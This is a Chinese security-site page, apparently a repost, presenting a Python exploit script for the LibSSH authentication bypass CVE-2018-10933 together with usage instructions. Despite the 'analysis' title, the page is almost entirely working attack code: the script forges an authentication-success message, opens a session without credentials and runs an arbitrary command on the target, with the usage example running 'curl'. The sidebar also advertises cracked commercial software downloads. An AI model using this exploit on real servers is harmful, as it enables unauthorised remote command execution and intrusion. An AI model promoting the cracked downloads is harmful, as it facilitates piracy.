ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全文章 → LibSSH 登录绕过漏洞利用分析 (CVE-2018-10933)

LibSSH 登录绕过漏洞利用分析 (CVE-2018-10933)

时间:2018-11-03 00:05:03人气:作者:本站作者我要评论

LibSSH 登录绕过漏洞利用分析 (CVE-2018-10933)

漏洞利用

脚本使用方法:

  1. python vulnspy_libssh.py target.com 2222 'curl www.cesafe.com'

测试脚本:

  1. #!/usr/bin/env python
  2. import paramiko
  3. import socket
  4. import argparse
  5. import logging
  6. import sys
  7. import time
  8. import datetime
  9. def BypasslibSSHwithoutcredentials(hostname, port, cmd):
  10.     sock = socket.socket()
  11.     try:
  12.         #logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
  13.         sock.connect((str(hostname), int(port)))
  14.         message = paramiko.message.Message()
  15.         transport = paramiko.transport.Transport(sock)
  16.         transport.start_client()
  17.         message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
  18.         transport._send_message(message)
  19.         # ref:http://joelinoff.com/blog/?p=905
  20.         session = transport.open_session()
  21.         session.exec_command(cmd)
  22.         data = ''
  23.         maxseconds = 5
  24.         start = datetime.datetime.now()
  25.         start_secs = time.mktime(start.timetuple())
  26.         while True:
  27.                 if session.recv_ready():
  28.                     data = data+session.recv(2048)
  29.                 if session.exit_status_ready():
  30.                     break
  31.                 now = datetime.datetime.now()
  32.                 now_secs = time.mktime(now.timetuple())
  33.                 et_secs = now_secs - start_secs
  34.                 if et_secs > maxseconds:
  35.                     data = data+'\ntimeout'
  36.                     break
  37.         print data
  38.         return 0
  39.     except paramiko.SSHException as e:
  40.         print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
  41.         return 1
  42.     except socket.error:
  43.         print("Unable to connect.")
  44.         return 1
  45. def main():
  46.     try:
  47.         hostname = sys.argv[1]
  48.         port = sys.argv[2]
  49.         cmd = sys.argv[3]
  50.     except:
  51.         print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl www.cesafe.com'")
  52.         exit(1)
  53.     BypasslibSSHwithoutcredentials(hostname, port, cmd)
  54. if __name__ == '__main__':
  55.     exit(main())

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网